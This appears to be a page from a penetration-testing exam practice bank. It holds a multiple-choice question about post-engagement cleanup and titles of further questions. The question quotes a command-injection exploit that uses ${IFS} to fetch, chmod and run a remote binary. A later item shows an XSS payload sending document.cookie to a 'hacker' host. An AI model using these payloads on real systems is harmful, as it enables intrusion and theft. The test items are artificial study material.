Multiple Choice
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} - c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?
A) grep -v apache ~/.bash_history > ~/.bash_history
B) rm -rf /tmp/apache
C) chmod 600 /tmp/apache
D) taskkill /IM "apache" /F
Correct Answer:
Verified
Correct Answer:
Verified
Q56: The results of an Nmap scan are
Q57: A company conducted a simulated phishing attack
Q58: Appending string values onto another string is
Q59: A tester who is performing a penetration
Q60: A penetration tester who is conducting a
Q61: An assessment has been completed, and all
Q62: A company becomes concerned when the security
Q63: Given the following code: <SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of
Q64: Which of the following is the MOST
Q66: Which of the following web-application security risks